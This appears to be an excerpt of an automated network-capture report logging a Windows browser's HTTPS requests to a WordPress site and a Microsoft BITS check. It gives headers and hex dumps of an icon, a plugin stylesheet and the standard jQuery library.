                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC1369INData Raw: f8 c5 26 90 24 a6 59 36 6a 96 55 1f 0c a3 5b 46 93 45 33 20 a9 6c d3 34 8d 40 d5 0a 54 cf 5f 95 4d 4e a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 61 26 9b 5f d4 e6 fc c0 6d 4d 9b cf e7 66 c5 38 e5 16 ce df 4e f3 03 19 4d cb 2f e4 f8 06 80 88 cd 2c 68 7e 58 e6 56 76 2c 71 cf de 9d 9f f3 c3 b4 fc 0c df 04 52 23 ef 8f 49 4e 8c e6 4e 3e e3 0f b5 98 8d ba ea ec a2 3f 54 66 9e b6 7f b7 77 ae 8b 8d b2 6a 14 06 e4 ec e9 82 b9 f9 3d 93 ec 30 26 0b 88 1a 9a a6 5f d7 f3 6b da 3a 28 87 07 f0 15 94 50 ec 1e 62 fb 25 b5 31 41 8b 6e 44 69 52 9b d1 b2 49 10 8a fd a2 d8 de 25 a4 bf da 78 b6 f6 e9 d8 2a 08 c5 3e 2f 76 5c d2 3e cc 2c 5e 47 b9 b4 fb 74 6c 16 84 62 9f 15 7b 36 69 37 a3 12 af a1 a7 74 80 81 41 72 42 b1 4f 89 ad 97 04 7c dd 28 ba 9a
                                                                                                                                                                                                                              Data Ascii: &$Y6jU[FE3 l4@T_MNPa&_mMf8NM/,h~XVv,qR#INN>?Tfwj=0&_k:(Pb%1AnDiRI%x*>/v\>,^Gtlb{6i7tArBO|(
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC1369INData Raw: 46 6c 7d 51 76 6d 88 9d 0b 6a dc 17 d2 5e af 43 a2 39 2e 76 9e 58 a3 4c 43 ed ff 4b 98 ca a1 67 01 c3 ec 78 71 95 4e e6 9a 99 a1 f0 27 b1 e6 86 02 62 cb 6b 47 44 b1 77 e8 36 8a 36 6b 2a d2 14 74 78 75 07 89 84 3b f2 2f 15 1b 2f 3e be 2a b6 50 39 bf 0d b1 17 48 ab e9 65 84 8e 0e dc a9 07 57 e6 9c d0 86 a5 d6 75 ce e5 ee 0d 83 67 72 8f d8 98 99 dc 5b a1 d8 d7 8b 9a 4a 62 9b 4b 99 52 ec 7b 96 73 8b ba dc e1 b8 b8 7d 7d a3 96 84 ff f1 2e b1 15 04 07 cf 89 7d 4d de b5 c5 de f7 24 4f 1b 98 20 3f 15 1b 2d d5 59 26 a8 aa b9 36 bd 93 ba 25 b6 86 63 ea 62 63 27 23 c6 6b 41 a3 d8 d7 59 a2 87 13 de 96 9c 52 6c 58 94 88 b8 73 a7 4f d3 99 45 e2 f6 e8 93 b9 51 89 37 88 8d 12 d8 0e 62 5f 8b 61 6e 89 ed a1 24 81 6c 5f dc fc eb a8 d8 43 56 68 bc 1c 0f 75 e5 56 ac 00 5c 48
                                                                                                                                                                                                                              Data Ascii: Fl}Qvmj^C9.vXLCKgxqN'bkGDw66k*txu;//>*P9HeWugr[JbKR{s}}.}M$O ?-Y&6%cbc'#kAYRlXsOEQ7b_an$l_CVhuV\H
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC1369INData Raw: 78 df ca e7 2f 29 85 0f 81 18 39 fb 3f 84 25 5d 51 e7 c4 16 0e c5 c6 ed 55 cb e5 5c f9 e3 7c f6 ff 03 ea d0 9a 5f 87 87 5b 68 5b 5b 6d 83 32 f9 cd d4 76 8e 42 08 35 99 4d a3 b8 66 79 52 b7 35 a3 b0 27 23 8f a7 d2 ff 3d c6 6e 8e 01 b1 f1 e3 61 30 49 40 b1 b7 23 b4 c3 70 a0 91 f6 52 37 63 ba 12 8b 4b 4a 29 76 1f b1 87 c6 c3 95 9f b1 09 24 4f ee 10 e3 c5 49 b1 b5 41 b1 b7 a3 12 62 ec ad 0d 87 4a 5d 46 c8 43 a5 43 d1 2d 99 14 9c 58 d7 3e e5 e2 eb fb b1 33 ab 40 b1 b1 93 c1 88 86 ae 89 2d 02 b4 54 6f 12 32 a8 72 43 a5 d8 7d c4 4e 45 a6 9f 23 36 ee 47 cc c8 e3 c1 b3 cc 0a 62 6f 99 0d 5c 4a dc 08 0c 64 e1 9f 88 8d 2b b5 50 a6 d5 a4 2d a3 aa 7c fa ce ac c5 fd d8 d0 1b a1 d8 78 4e cc cc 0c 62 67 46 68 a9 5a 62 0b d3 82 62 f7 15 1b 0f 44 ec 0f 12 3b 13 a5 d9 b6 59
                                                                                                                                                                                                                              Data Ascii: x/)9?%]QU\|_[h[[m2vB5MfyR5'#=na0I@#pR7cKJ)v$OIAbJ]FCC-X>3@-To2rC}NE#6Gbo\Jd+P-|xNbgFhZbbD;Y
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC1369INData Raw: df 50 ec 37 88 0d b3 3f 40 7e 7b 48 dc 1e 29 a8 e1 d9 32 2b d3 4d 6c 1c 9f 62 2e 47 bf 33 b1 a5 58 c4 b1 39 60 67 15 a7 7d 53 71 d7 ca 99 cd c6 85 1e 62 e3 f8 0c 63 38 c5 7e b3 d8 53 2a a3 c5 b7 31 81 89 2d a0 b1 97 fb 09 d5 49 6c bc 91 59 fe 25 28 f7 25 66 a1 42 36 bf 8e cf fa a8 a1 2a 36 8e 91 48 fc 57 b8 1e 52 3b 29 36 8e 14 f6 21 57 83 a0 d8 6f 16 5b a5 8f 7b 94 ed b2 2e 3b f0 a0 6d 79 9c 9b bb 8a 8d 8d 38 42 77 58 4b 4c 4f a9 9c 41 09 0a 94 d5 d7 4f c4 8e 18 ad 42 e9 f3 e5 af 9d c5 9e 72 e6 36 9d d1 44 b1 df 27 76 7b 2e 6e b4 f8 2e 9e 76 2c 18 fd 7b 1e b9 9e fa 8a 8d d1 67 57 e8 3e ee fe e4 2f 04 59 7d 46 ef b2 73 35 14 d6 24 8a ad e1 56 1d 6e 1e d4 a6 10 96 9e 62 e7 1e 2e c2 8f 8d 42 c9 68 8a dd 4f ec 29 95 99 be 51 ec b6 54 68 e8 f8 bc 28 5d 27 b1
                                                                                                                                                                                                                              Data Ascii: P7?@~{H)2+Mlb.G3X9`g}Sqbc8~S*1-IlY%(%fB6*6HWR;)6!Wo[{.;my8BwXKLOAOBr6D'v{.n.v,{gW>/Y}Fs5$Vnb.BhO)QTh(]'
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC545INData Raw: ce 32 e6 0e 62 43 a2 29 52 ec b7 8b 8d c8 d4 83 55 f4 42 39 14 35 88 5d 3e c0 9d 6a 17 b1 31 74 86 18 94 ca 25 44 6a 51 25 ca 04 0c 50 ac 20 36 98 dd 92 17 23 79 1d c4 86 05 04 a3 a0 d8 1f 20 b6 1e d3 eb 58 d1 11 25 ef 6c 1d db 89 db e5 21 90 0f f2 74 11 1b db 2c 86 cf 74 33 b1 61 8a a2 49 0c 43 da b2 80 d6 28 36 f6 d0 b2 31 dd c6 69 ba 7f 59 6c ec 5d 2c c5 fe 1e b1 fb 9b 6d 45 67 d4 2c dd 85 b0 ea e7 19 58 c3 e2 2e 04 1b 9b e6 f8 47 94 d8 a2 fc 23 51 64 36 3f 23 1a de b7 09 89 69 b1 83 68 27 77 61 09 5e b4 f0 7f 11 f7 c0 89 54 ce 22 d0 ca 90 aa 5f ae 86 14 e1 ef f0 5f b1 50 f8 96 d2 0e 62 bf c3 6c 2b 08 d9 0f 1f 77 75 14 bb 6d 36 bd 26 e4 a7 8b 8d 68 97 4e 63 e8 35 a1 d8 df 2c 76 ff d8 b8 51 ac 7c 42 b1 3f 55 6c 61 d3 29 9c 66 dd 13 8a fd b9 62 0b 35 a4
                                                                                                                                                                                                                              Data Ascii: 2bC)RUB95]>j1t%DjQ%P 6#y X%l!t,t3aIC(61iYl],mEg,X.G#Qd6?#ih'wa^T"__Pbl+wum6&hNc5,vQ|B?Ula)fb5


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              29192.168.2.649754141.193.213.114431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC387OUTGET /wp-content/themes/tac-child/images/icon-close.png HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC451INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:03 GMT
                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                              Content-Length: 238
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                              Cf-Polished: origSize=263
                                                                                                                                                                                                                              ETag: "66f56b86-107"
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:11:18 GMT
                                                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5b70b3b6b11-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC238INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 04 00 00 00 26 f7 70 e6 00 00 00 b5 49 44 41 54 78 da e5 d4 31 0d 03 31 10 05 d1 0f e1 a0 04 42 20 1c 04 43 38 46 07 25 10 0c 21 10 02 c1 91 5c c4 4a a6 db a9 a2 1b 77 96 fc 1a af 36 7f d4 3d f5 f6 6c f9 a9 65 e4 4c a9 f9 b6 7f 93 7b c6 3c 67 91 1b 93 cc 6a 4b 5f 64 89 1b 69 89 24 c9 29 92 9c 22 c9 29 92 9c 22 c9 29 92 9c 22 c9 29 92 9c 20 05 47 52 73 24 c9 59 f2 01 ce 91 e0 14 f9 fc 70 47 44 f8 59 ac 51 c1 81 f4 dc 91 ee 48 ce dd 06 52 71 01 69 39 92 9a 23 a9 39 92 9a 23 59 e3 48 be 40 ca e5 7e 03 89 c0 29 92 9c 22 c9 59 72 07 57 20 31 08 8b 2b 91 0d d7 25 6e bd bd 6e 6f fb c7 25 98 91 5d d5 9f 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                              Data Ascii: PNGIHDR((&pIDATx11B C8F%!\Jw6=leL{<gjK_di$)")")") GRs$YpGDYQHRqi9#9#YH@~)"YrW 1+%nno%]IENDB`


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              30192.168.2.649756141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC625OUTGET /wp-content/plugins/tac-tablepress-datatables-column-filter-widgets/css/ColumnFilterWidgets.min.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC477INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:03 GMT
                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Tue, 15 Oct 2024 16:55:20 GMT
                                                                                                                                                                                                                              ETag: W/"670e9e78-222"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614815
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5b89876462c-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC553INData Raw: 32 32 32 0d 0a 2e 63 6f 6c 75 6d 6e 2d 66 69 6c 74 65 72 2d 77 69 64 67 65 74 7b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 63 6f 6c 75 6d 6e 2d 66 69 6c 74 65 72 2d 77 69 64 67 65 74 20 73 65 6c 65 63 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 35 70 78 7d 2e 63 6f 6c 75 6d 6e 2d 66 69 6c 74 65 72 2d 77 69 64 67 65 74 73 20 61 2e 66 69 6c 74 65 72 2d 74 65 72 6d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 39 30 25 7d 2e 63 6f 6c 75 6d 6e 2d 66 69 6c 74 65 72 2d 77 69 64 67 65 74 73 20 61 2e 66 69 6c 74 65 72 2d 74 65 72 6d 3a 68 6f 76 65 72 7b 74 65 78 74 2d
                                                                                                                                                                                                                              Data Ascii: 222.column-filter-widget{float:left}.column-filter-widget select{display:block;width:auto;margin:5px}.column-filter-widgets a.filter-term{display:block;text-decoration:none;padding-left:10px;font-size:90%}.column-filter-widgets a.filter-term:hover{text-
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              31192.168.2.649744184.28.90.27443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                              Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                              X-CID: 11
                                                                                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                              X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                              Cache-Control: public, max-age=81729
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:03 GMT
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              X-CID: 2


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              32192.168.2.649762141.193.213.114431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC411OUTGET /wp-content/uploads/hummingbird-assets/f36d1c67b2b5257dc0a6c9820472d804.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC493INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:03 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 14:55:46 GMT
                                                                                                                                                                                                                              ETag: W/"670fd3f2-18b35"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614816
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5ba3bb60c07-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC876INData Raw: 37 64 63 33 0d 0a 2f 2a 2a 68 61 6e 64 6c 65 73 3a 6a 71 75 65 72 79 2d 63 6f 72 65 2c 6a 71 75 65 72 79 2d 6d 69 67 72 61 74 65 2a 2a 2f 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29
                                                                                                                                                                                                                              Data Ascii: 7dc3/**handles:jquery-core,jquery-migrate**//*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0)
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC1369INData Raw: 76 61 72 20 72 2c 69 2c 6f 3d 28 6e 3d 6e 7c 7c 43 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 6f 2e 74 65 78 74 3d 65 2c 74 29 66 6f 72 28 72 20 69 6e 20 75 29 28 69 3d 74 5b 72 5d 7c 7c 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 26 26 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 72 29 29 26 26 6f 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 72 2c 69 29 3b 6e 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 65 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65
                                                                                                                                                                                                                              Data Ascii: var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC1369INData Raw: 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 73 2c 73 6f 72 74 3a 6f 65 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 6f 65 2e 73 70 6c 69 63 65 7d 2c 63 65 2e 65 78 74 65 6e 64 3d 63 65 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 73 3d 31 2c 75 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6c 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 6c 3d 61 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 73 5d 7c 7c 7b 7d 2c 73 2b 2b 29 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 76 28 61 29
                                                                                                                                                                                                                              Data Ascii: turn this.prevObject||this.constructor()},push:s,sort:oe.sort,splice:oe.splice},ce.extend=ce.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||v(a)
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC1369INData Raw: 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 73 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 73 65 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 69 73 58 4d 4c 44 6f 63 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 72 65 74 75 72 6e 21 6c 2e 74 65 73 74 28 74 7c 7c 6e 26 26 6e 2e 6e 6f 64 65 4e 61 6d 65 7c 7c 22 48 54 4d 4c 22 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e
                                                                                                                                                                                                                              Data Ascii: =typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:se.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument||e).documentElement;return!l.test(t||n&&n.nodeName||"HTML")},merge:function(e,t){for(var n=+t.len
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC1369INData Raw: 2c 6f 2c 61 2c 54 2c 72 2c 43 2c 64 2c 69 2c 6b 3d 6d 65 2c 53 3d 63 65 2e 65 78 70 61 6e 64 6f 2c 45 3d 30 2c 6e 3d 30 2c 73 3d 57 28 29 2c 63 3d 57 28 29 2c 75 3d 57 28 29 2c 68 3d 57 28 29 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 74 26 26 28 61 3d 21 30 29 2c 30 7d 2c 66 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 74 3d 22 28 3f 3a 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31
                                                                                                                                                                                                                              Data Ascii: ,o,a,T,r,C,d,i,k=me,S=ce.expando,E=0,n=0,s=W(),c=W(),u=W(),h=W(),l=function(e,t){return e===t&&(a=!0),0},f="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",t="(?:\\\\[\\da-fA-F]{1
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC1369INData Raw: 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 4d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 56 28 29 7d 2c 52 3d 4a 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 66 65 28 65 2c 22 66 69 65 6c 64 73 65 74 22 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 6b 2e 61 70 70 6c 79 28 6f 65 3d 61 65 2e 63 61 6c 6c 28 79 65 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 79
                                                                                                                                                                                                                              Data Ascii: slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},M=function(){V()},R=J(function(e){return!0===e.disabled&&fe(e,"fieldset")},{dir:"parentNode",next:"legend"});try{k.apply(oe=ae.call(ye.childNodes),y
